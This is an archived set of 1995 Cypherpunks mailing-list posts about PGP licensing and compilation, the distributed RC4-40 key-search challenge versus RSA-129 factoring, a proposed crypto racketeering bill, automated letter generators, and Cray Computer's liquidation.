   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim werner <werner@mc.ab.com>
Date: Mon, 17 Jul 95 12:41:11 PDT
To: attila <attila@PrimeNet.Com>
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
Message-ID: <9507171938.AA03018@mondo.ab.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT)
>From: attila <attila@PrimeNet.Com>

>and, conspiracy theories non-withstanding, we the people do not govern 
>America --we are only given a short list of politicians who have sold 
>their soul to CFR's satanist inner circle.

What's CFR?


tw

-- 

Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim werner <werner@mc.ab.com>
Date: Mon, 17 Jul 95 13:17:48 PDT
To: cypherpunks@toad.com
Subject: Is it legal for commercial companies to use PGP?
Message-ID: <9507172015.AA03056@mondo.ab.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I was reading in some Where to Get PGP Web page that "PGP2.6.2 is legal
to use in the U.S. for non-commercial purposes (i.e., you cannot sell it
or the functionality it provides)".  Can anyone on the list say whether
this is true?  That is, was the use of "i.e." correct, or should it have
been "e.g."?

Or, to put it more succinctly, I was talking to one of the sys admins at
A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
because Viacrypt owned the commercial rights.  But, according to the bit
I quoted, it would only be a violation if A-B tried to put PGP into one
of their products.

Has anyone heard a (hopefully legal, but I'll listen to anyone's
opinion) answer to this?


thanks,
tw

-- 

Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 17 Jul 95 13:28:50 PDT
To: cypherpunks@toad.com
Subject: Re: \"Judgement Proof\" and Putting Up or Shutting Up
Message-ID: <199507172028.QAA20744@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by klp@noc.cis.umn.edu () on Mon, 17 Jul  3:4 
 PM

>Council on Foreign Relations.
>
>Silly me, I thought it was the Tri-Lateral Commission 
>that really steered  the boat, must have been wrong :)


CFR ->

TLC ->

Opus Dei ->

Cyclops in the Land of The Blind ->

Blind Leading the Blind ->

Wanderers in the Wilderness ->

Michael Jackson Leading the World's Rainbow Children of 
Benetton ->

Marty Rimm, 16-year-old Sheik of AC, Porno-poller of CMU -> 

Bob Guccione - >

FC - > CFR!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CHEWEY-NOUGAT-ABE <ESPAULDING@CENTER.COLGATE.EDU>
Date: Mon, 17 Jul 95 13:39:04 PDT
To: cypherpunks@toad.com
Subject: PGP compilation problems on vax
Message-ID: <01HSZETHQNDEA4LUAI@CENTER.COLGATE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


	Once upon a time I was able to successfully compile
PGP 2.3 on our vax without a fuss.  Then we switched over to
a happy alpha vax, and all my jolly executables went the way of the
dustbunny.  My problem is this:  neither 2.6 nor 2.3 code will compile
on my alpha, apparently because the function hashpass is undefined.
Anyone have an easy remedy they can email me?  

Thanks,
Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 17 Jul 95 16:36:16 PDT
To: bart@netcom.com (Harry Bartholomew)
Subject: Re: Automated Rant Generators and Letter Generators
Message-ID: <ac300ac51b0210043421@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:29 PM 7/17/95, Harry Bartholomew wrote:
>>
>> Cypherpunks could probably have an effect on hastening this "denial of
>> service" attack on the efficacy of letter-writing by releasing an
>> easy-to-use package that does all this letter writing at the click of a
>> button....just type in some key words, for the topics, and it does the
>> rest.
>>
>> An interesting project, actually.
>>
>> --Tim May
>>
>    A final step might be to interface the output to old pen plotters
>    like my HP7470A with an ascii-to-handwriting program.  Akin to
>    the White House souvenir signature generator, but with a set of
>    parameters to mimic different "hands".  Knuth's Metafont tricks
>    come to mind.

By the way, I should first say that I have nothing against letter writing,
and my comments about "hastening" a "denial of service" attack on
letter-writing are mostly just out of general interest.

Bart's comments about using Knuth's typographic work are interesting, to
the extent that letters need to look handwritten. In the Mac market, it's
possible to send in some handwriting samples and get back a font that
emulates the handwriting!

I don't think the pen plotter is actually needed--and few people would use
it--as most faxes can be emulated with laser printers (due of course to the
limited dots per inch resulution). In fact, most fax modems can directly
fax from any screen that can produce printed output. So, the combination of
handwriting fonts, automated rant generators (of varying rabidities), and
fax capabilities gives a pretty good start. Using lots of handwriting
samples, various other fonts, and a mix of styles in the letters will help.

Anyway, where this all gets interesting is the following:

* Can a kind of Turing Test be tried here?

That is, in this limited domain of "letters to the editor/Congressmen," can
a letter generator be implemented which generates letters effectively
indistinguishable from letters and faxes generated by actual human beings?
("Effectively indistinguishable" in the sense that a human reader could not
sort a set of letters into human- and machine-generated subsets with
statistically significant certainty better than guessing).

Of course this is also similar to the "style detectors" we so often talk about.

The crypto relevance has to do with detecting patterns in letters and
rants, in emulating these patterns, and (perhaps) in speeding up lobbying.
(Though I agree that widespread adoption of automated letter-writing, such
as the direct mail folks are already doing, will eventually just kill off
letter writing as a means of lobbying.)

This may also hasten the adoption, someday, of digital signatures.
Congressmen and their aides may check incoming letters against databases of
their consituents who have "registered" with them (lots of issues here).

Merely counting the "yes" and "no" letters has long been problematic, as
the Republicans have been leading in direct mail campaigns since at least
the mid-70s (recall Richard Viguerie...). Increased automation will just
make it even more obvious.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 17 Jul 95 13:44:29 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: RSA-129 vs. RC4 (was Re: RC4 crack)
In-Reply-To: <Pine.ULT.3.91.950717151714.25405B-100000@krypton.mankato.msus.edu>
Message-ID: <199507172043.QAA09575@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I remember when RSA129 was being done, the program you have you manually 
> get a start location, and then email transparent any results that it 
> got.  The program that doled out areas to search would base those on what 
> had already been mailed in.  I don't know the details of how exactly that 
> worked, however.

Not quite.  The UIDs that were given out for RSA-129 had nothing to do
with the search space.  The reason is that RSA-129 did not search for
the prime factors; it searched for quadratic residue relations.
Moreover, ANY relations within the space is a valid datapoint.  As a
result, the UIDs ojnly told the factoring clients where to start
looking for relations.

You can effectively think of it as a seed to a random number
generator.  So long as everyone has a different seed, they will get
different random numbers.  Thats what the UIDs did; provided each
client with a different starting point.

You had to get a new UID for each run of mpqs because starting over
with the same uid would re-run all the checks you've already done.
Why double-run when UIDs are cheap?  You see, unlike the RC4 crack,
there was no relation between the UIDs and the relations returned.

As the person who wrote the UID returning script, I can tell you that
all it did was keep a file with the last UID given, and when an email
requests came in, it would create a lock on that file, return the last
UID+1 through the number of UIDs requested, and then update the file.
There was no basis of the relations received.  In fact, the UID
responder could have been run on any machine -- it could care less
about the data returned.

> But, if the program could be written in such a way that it was all 
> automatic, mailing in results and automatically (maybe via a telnet 
> port?) getting the information about what to search, that would be most 
> nice. 

The point of runfactor was to allow you to obtain a large segment of
UIDs and dole them out locally.  Since there wasn't a relation between
UID and data returned, then it didn't matter if some UIDs never
returned.

For RC4, you _have_ to search everywhere.  Therefore, you would want
to make runfactor an interactive program that contacted a central
server whenever it wanted to get some search space.  I dont think this
would be very hard to write.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 17 Jul 95 13:49:49 PDT
To: CHEWEY-NOUGAT-ABE <ESPAULDING@CENTER.COLGATE.EDU>
Subject: Re: PGP compilation problems on vax
In-Reply-To: <01HSZETHQNDEA4LUAI@CENTER.COLGATE.EDU>
Message-ID: <199507172049.QAA09700@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 	Once upon a time I was able to successfully compile
> PGP 2.3 on our vax without a fuss.  Then we switched over to
> a happy alpha vax, and all my jolly executables went the way of the
> dustbunny.  My problem is this:  neither 2.6 nor 2.3 code will compile
> on my alpha, apparently because the function hashpass is undefined.
> Anyone have an easy remedy they can email me?  

There is no such animal as an "alpha vax".  Perhaps you mean an Alpha
running Open/VMS?  PGP 2.6 is way old.  The most recent release is
2.6.2, which I'm told builds fairly cleanly on Open/VMS.  You shoulod
download 2.6.2 and try using that.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Mon, 17 Jul 95 10:37:25 PDT
To: cypherpunks@toad.com
Subject: TIME pathfinder registration
Message-ID: <m0sXxKb-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

I note someone has used "cypherpunks" as a login for TIME Mag's
WWW service.

I'd guess it was in the spirit of other such enrollments.
If so, what's the password?
- -- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMArQLhqU5+N/mI7JAQGAPwQAjVGA8kf/ncHJ+ltzVwnzr7ncCjCpcvxv
kaPRYrIJHE5qQzm7YLKfrn6kv51f+QZgRQHZz0wWtQoQgSwta0WQXBbbU7CWFy95
vE1sKselPRElDkLRxzltgJqLCAYZBBAnjxlnck7EaDbXfyAGsTbNIE261PsXDMUk
IyyYk+2Tc04=
=JwQi
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com (Le Dieu D'Informations Insensibles...)
Date: Mon, 17 Jul 95 17:23:06 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: ECM list.
Message-ID: <199507180019.RAA22752@ccnet.ccnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>I'm also considering other strategies for gaining e$--  offering a service
>on the DigiCash "cybershops" page, or just going to all my e-mail using
>friends, showing them how to get their free e$100.00, and then begging them
>to give me half of it.  (Finder's fee?  Friendly gift?)
       Why not offer an anonymous proxy of some kind for e-cash? You can
charge per connect or per unit of time, simply to demonstrate the concept. The
techniques developed for remailers(breaking up messages...accepting PGP-
encrypted destinations...varying times...so on) could find an application
here. If a chain could be constructed, it would help protect the identity of
the user(assuming no collusion between operators). 

The problem is, as always, to write the code. Not to mention the
ethical/possibly legal question of selling anonymity...

Another possible service: selling gems of wisdom in pieces.

Find or write a gem of wisdom...taking into account copyright laws and so
forth.
Then set up a storefront via telnet or http...a sort of kiosk. Customers can
then buy secrets or portions of secrets...or percentages. Use a secret
splitting algorithm to allow people to 'split the cost' of a secret and then
get in touch with each other through anonymous remailers set up for that
purpose by your kiosk.
        Depending on the information you're selling(whether it be the secret
key for BlackNet or simply the contents of your CD collection), you could earn
some e-cash this way. An all-or-nothing-disclosure-of-secrets protocol might
also come in handy.
        Again, the problem is sitting down and writing the code. Has anyone
made any significant efforts toward either of these yet, with or without CD$?

David Molnar

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMApx1+FDHpuTkgoVAQEo/Af/cmZPKI1Uk/hFbTwuQwcZbDagnAHpZkqZ
WdJMUe/4RxOymB5mnfvM7bl4S4x5BrUJJ6mepQwq0/39PiJRWAJFJFnhuZoIin5o
I5KCOTNQMVNdJLL7iTtZJEqrIEGhfq2lrRpbyc1wPGj+9l7tWlSfTXLl+E0z6MtZ
OWEJ0mzP4eG5TQJEtObAqD5QYOhHngEN96NMYDUv6gYzZROx3zovYqrFFrJt8zr1
HkxZzpA/rGHdoCAeViLAqO42o18zRvu8j0i7VIXI/rx6rOQ6gCDs4tgjMH1BSQH4
3rMfxb0KB8Vlmd1AL1OzvhRSy9cbBvdX2D+iOC7sZQ755JBRwJKd2Q==
=9YVg
-----END PGP SIGNATURE-----

lo...look to the sig, for there will be no sign






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 17 Jul 95 15:24:38 PDT
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: RSA-129 vs. RC4 (was Re: RC4 crack)
In-Reply-To: <199507172043.QAA09575@toxicwaste.media.mit.edu>
Message-ID: <Pine.ULT.3.91.950717171457.27307B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 17 Jul 1995, Derek Atkins wrote:

> Not quite.  The UIDs that were given out for RSA-129 had nothing to do
> with the search space.  The reason is that RSA-129 did not search for
> the prime factors; it searched for quadratic residue relations.
> Moreover, ANY relations within the space is a valid datapoint.  As a
> result, the UIDs ojnly told the factoring clients where to start
> looking for relations.

Thanks, I stand corrected.  As I said, I really don't understand at a 
basic level how it works.  These factoring projects are, to me, an 
interesting sociological experiment.  Of course, to do this correctly, 
you need software that is easy to use. :-)

So, the ability to run a program in such a fashion that as much is 
automated as possible is a "Good Thing{tm}".


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMArjMjokqlyVGmCFAQHrdgP+NzpimLDgMY0/HMk8CVu4iaqmCdljxLLv
+G6k3CkkiCvowLTEHv45NUaixWl38VgeMnp2vxOPVFcb5lEdHLd2DqXL4vj7sjg1
rWAIX4/Q+/KL98ATCw9+ePs+CFSM3HAkRWT6sNmmAJyHj6y13Yk3Fa9qY5Gt5kO3
8wqSPO2aOYE=
=1ZOw
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 17 Jul 95 09:07:25 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <9507171606.AA10619@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


I am not familiar with american laws and have two questions:

1. If the bill becomes law, how can someone who violates it be
punished? 


2. Does someone who publishes software which encodes or encrypts 
(ASCII is a code, isn't it?) have to prove that he has provided the
universal decoder to the state or does the state have to prove that he
didn't do? 

In the former case, does he get any receipt from the department of
justice and what does the receipt say (1.3MByte of software
received...)?

In the latter case, how do they want to prove he didn't? If he gave
just a big 

  for(i=0;;i++) try_key(i);

how do they want to prove this doesn't work? There is a certain
problem in theory. I don't know the english name, but in german it is
called the 'halt problem'. It is not a simple task to prove that a
certain turing machine program doesn't stop or doesn't find a solution of a
given problem. How do they want to prove that the program provided to
the department of justice doesn't find the key just within the next 10
seconds?

Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Mon, 17 Jul 95 15:28:00 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <v01510102ac3065ad0aaa@[193.74.217.20]>
Message-ID: <9507172227.AA09751@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Spring writes:
> This wasn't really my point.  Grassley's bill implies that uploading crypto
> to an overseas FTP site would qualify as a predicate act, needed for a RICO
> seizure.  I think he is assuming that someone would do this for the
> purposes of making money: and that anything bought with that money would be
> RICOable.  I don't think he or anyone else in Congress is aware that people
> tend to do this stuff for free.

I disagree.
Sec. 1030A (a) under S.974 would make it illegal to
"transfer unlicensed computer software,"
*"regardless of whether the transfer is performed for
economic consideration"*.

S.974 would make each such transfer a predicate act
for RICO purposes. 

(this message is oddly formatted due to problems I'm
having with my environment right now)

-Futplex




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 17 Jul 95 16:07:04 PDT
To: cypherpunks@toad.com
Subject: OUT_law
Message-ID: <199507172306.TAA12229@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-17-95. W$Japer:


   "As Regulators Seek to Police Internet, An Offbeat Finnish
   Service Fights Back." (PW cited earlier.)

      The U.S. Congress and governments from Singapore to New
      Zealand are mulling new efforts to control the flow of
      material over the Internet. But from a barren storefront
      in Finland's capital, Johan Helsingius is doing
      everything he can to prevent this. He may well be
      winning the fight.                             JUF_pug


   "Louis Freeh's Golden-Boy Image Faces Scrutiny Over FBI's
   Role in Shootout."

      During his 23 months as director of the Federal Bureau
      of Investigation, Louis Freeh has generated the
      golden-boy image the FBI needed. Now , Mr. Freeh's
      judgment is open to more intense scrutiny ... raises the
      possibility of that dreaded Washington phenomenon: the
      coverup.                                       REX_rug



   Zwei: OUT_law











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Mon, 17 Jul 95 16:32:53 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <199507172337.SAA10144@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>From: Michael Froomkin <Michael@umlaw.demon.co.uk>

>Jim didn't take my Con Law I course.
>
>In message <199507161819.OAA06090@bb.hks.net> Jim Ray writes:
>[cuts throughout]
>> 
>> Amendment IX -- "The enumeration in the Constitution of certain rights
>> shall not be construed to deny or disparage others retained by the people."
>                                                      ^^^^^^^ 
>> [The right to write code was among many rights NOT enumerated.]
>> 
>
>Very hard to argue that the right to write code (as opposed to, 
>say, the right to write in code) existed in the late 18th 
>century; hence it is hard to argue that it could be "retained" 
>today.  

What about Jacquard loom cards?

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Mon, 17 Jul 95 17:34:45 PDT
To: cypherpunks@toad.com
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
Message-ID: <NqRe9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

mpd@netcom.com (Mike Duvos) writes:

> 
> > What's CFR?
> 

Code of Federal Regulations?



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAr8cN74r4kaz3mVAQFZUgP+K/tIieWM1meiSWMfveLeF/LTLc1oLTp/
IftfXZokadfbh9RMvSXfiJvCVHZS/mRa33KG+SCNjt+K0yLWi7JrYFEmepGxFlVn
NjcrZdM+lFfNc03ksgOlccZg+o7GlzBNUW3s7yN2/Y2aRss22mfJkhtWvfaqDs7h
mYT4tONtNSQ=
=Zp8i
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Mon, 17 Jul 95 17:34:51 PDT
To: cypherpunks@toad.com
Subject: Is it legal for commercial companies to use PGP?
Message-ID: <LuRe9c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tim werner <werner@mc.ab.com> writes:

> Hi,
> 
> I was reading in some Where to Get PGP Web page that "PGP2.6.2 is legal
> to use in the U.S. for non-commercial purposes (i.e., you cannot sell it
> or the functionality it provides)".  Can anyone on the list say whether
> this is true?  That is, was the use of "i.e." correct, or should it have
> been "e.g."?
> 
> Or, to put it more succinctly, I was talking to one of the sys admins at
> A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
> because Viacrypt owned the commercial rights.  But, according to the bit
> I quoted, it would only be a violation if A-B tried to put PGP into one
> of their products.
> 
> Has anyone heard a (hopefully legal, but I'll listen to anyone's
> opinion) answer to this?

As I recall, the following is a correct scenario: a customer can use PGP to
send credit card numbers to a vendor he's making a personal purchase from,
but the vendor must use Viacrypt. If the customer is buying something to use
for business, BOTH  must use Viacrypt.





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAr+Ut74r4kaz3mVAQFMqwP8CgTKl3QetW+vn/A4TqJE2BrTEstM8fuw
2ZrmDZjHbZwISPtgbtwesup+wqknc9ECQwNKoyqbg5vYtK6Zd2tLVrD9gs7suA2F
BEJeBNNMoGDPBh6Ep4alwtK6JpSt+e+AMTimRQCml+sf/md0GM6UovR1ZufQBTog
+jLDu9KNRSg=
=MCgA
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Mon, 17 Jul 95 17:34:56 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <ease9c3w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Andrew.Spring@ping.be (Andrew Spring) writes:

> So I'm wondering who this RICO stuff applies to.  The guy who wrote it and
> uploaded it to an FTP site?  He's not profiting.  The guy who uses it? He
> didn't commit the predicate act.  Who?

It doesn't matter. Even if they say "Oops, sorry" later, the best you can
hope for is to get your computer returned as a bushel basket full of junk
parts. More likely it'll end up in some police station with "D.A.R.E."
painted all over it.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAsAMt74r4kaz3mVAQHtygP+Ou3wJB68ECFzanKNO7l4AIqtZfApNA1z
jZNatwmBZGOnQbC6LSQi5La5lws+U/yUs40hW8ZBVwG0/qUGH4RUra57Ubrtya+e
B8vz9/Vnou8a5DkW4fSsL+eiNeJimKiFAguUQSdex3gJShjXIpVk/++3AKvEVy6h
q43kUVG9irM=
=VWRM
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 17 Jul 95 17:59:58 PDT
To: cypherpunks@toad.com
Subject: Re: TIME pathfinder registration
Message-ID: <199507180059.UAA12182@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Will Kinney <kinney@bogart.Colorado.EDU> writes:
>> I note someone has used "cypherpunks" as a login for TIME Mag's
>> WWW service. ... If so, what's the password?
>
>This was me. The password is "writecode", since Pathfinder didn't allow
>the login and password to be the same.

Perhaps in the future people might use "sknuprehpyc" in such cases?
And of course, don't put the list's email address in.

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim werner <werner@mc.ab.com>
Date: Mon, 17 Jul 95 18:10:02 PDT
To: cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <9507180107.AA03586@mondo.ab.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 17 Jul 1995 16:15:10 -0400
>From: tim werner <werner@mc.ab.com>

>... I was talking to one of the sys admins at
>A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
>because Viacrypt owned the commercial rights.

I should have mentioned that I have no problem with people trying to
make money.  However, it turns out that ViaCrypt is not selling
site-licenses, or even floating licenses, so they actually want to sell
a separate copy for every user that will use it.

As it happens, the aforementioned sys admin had purchased 5 licenses, to
take care of the 2 users he already knew about, and figuring that there
would probably be a couple more wanting to jump on the bandwagon.  He
offered to let me use one of the licenses, but there's no way I can go
and tell my users "we have PGP", if I can't tell everyone that they can
do it.

And, there's no way I can see convincing my boss that we need that many
copies of ViaCrypt, just so everyone in my department can encrypt their
email traffic.

Of course, I realize that none of the above changes the legality.


thanks,
tw

-- 

Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 17 Jul 95 13:16:38 PDT
To: hayden@krypton.mankato.msus.edu
Subject: Re: RC4 crack
Message-ID: <20156.9507172011@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hayden <hayden@krypton.mankato.msus.edu> writes on cpunks:
> So what was the result of the RC4 key cracking thing that happened last 
> week?  It's at 100% but that's all it says.

[I answered this in email but the answer is: all will be told soon]

A brief explanation is called for, basically the 100% is %age
allocated, and there are still a few stragglers being swept.

For a brief explanation have a look at the brute-rc4.html page which I
have now updated:

	http://dcs.ex.ac.uk/~aba/brute-rc4.html

A more detailed report will be posted to cpunks when the last keyspace
has been swept.

We are expecting that no key will be found at this stage, as it was
not sure to being with that the supplied plaintext/ciphertext was a
correct pair of RC4-40.  Lack of open Micro$oft specs on the workings
of Micro$oft Access meant that we were guessing, and hoping that we
got it right.  The original brute rc4 project was started on the basis
of 'lets brute it and see'.  Looks like nothing will come out.

Several folks have various parts of an RC4 SSL bruter (netscape secure
sockets layer) and are working on sockets based farming tools to allow
this one to be more automated, as there have been key space management
problems with the bruterc4 effort.  Also means a better % of idle time
will be soaked on particpating machines, as we will not need to wait
for operators to get in the next morning, or rely on people to
remember which space they have swept to paste back into the confirm
box.

Soon ( a week maybe ) the respective parties hope to have all this
sorted out, and get ready for a SSL breaking effort.

So outcome of RC4 soon, followed by SSL effort announce in a while.

In the RC4 outcome announce will be a % break down of how much compute
people swept, even some folks on single PCs have swept as much as 1%
of keyspace alone in 1 week.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thresher!thad@netcom.com (Thaddeus J. Beier)
Date: Mon, 17 Jul 95 21:30:29 PDT
To: cypherpunks@toad.com
Subject: Re: Cray Computer liquidating...
Message-ID: <199507180423.VAA01942@thresher>
MIME-Version: 1.0
Content-Type: text/plain




Phil Fraerling asks if there is any crypto relevance to CCC liquidating.
There definately is some.  They were in the middle of building a Cray 3
with .25 Million PIM processors for the NSA.  It was a wild machine,
basically it used the Cray to pass data back and forth very quickly
among the 1 bit processors.  Someone who worked on it said that it
reminded him of Wayner's hypothetical DES cracking machine.

It was never very close to being finished.  It will be interesting to
see if somebody tries to finish it, or if they use some other
platform to use the PIM (processor-in-memory) chips.  I'd love
to see who bids for the half-finished machine at the coming
liquidation...

thad
-- Thaddeus Beier                   email:  thresher!thad@netcom.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Mon, 17 Jul 95 18:22:28 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: RC4 crack
Message-ID: <199507180122.AA21067@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jul 95 21:36:45 +0100 you wrote:

>
>Yep a telnet port is it for both reporting and getting keys, also the
>WWW interface to the same.
>
>> I'd basicly like to be able to start the program, nice it, slam it
>> in the background, and forget about it.
>
>Adam
>
Is there an easy way to integrate machines who are not on-net 24-7
into this protocol?  Not all of us have dedicated lines.:)
					Dan Bailey
******************************************************************************
Vote Speaker Newt Gingrich for President!!                     Dan Bailey
Worcester Polytechnic Institute, class of 1997.                 merzbow@ibm.net
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 17 Jul 95 21:29:05 PDT
To: Phil Fraering        <cypherpunks@toad.com
Subject: Re: Cray Computer liquidating...
Message-ID: <ac3083cd1d021004a397@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:32 AM 7/18/95, Phil Fraering wrote:
>According to a flier from an e-mail list I'm currently
>unwillingly subscribed to, Cray Computer is going out
>of business.
>
>Any comments and/or crypto relevance?

This is Cray Computer, not the older Cray Research.

Cray Computer was developing a GaAs-based computer that used advanced
robotic assembly/packaging. Cray Research spun off the project, led by
founder Seymour Cray, and the two companies were wholly separate. Cray
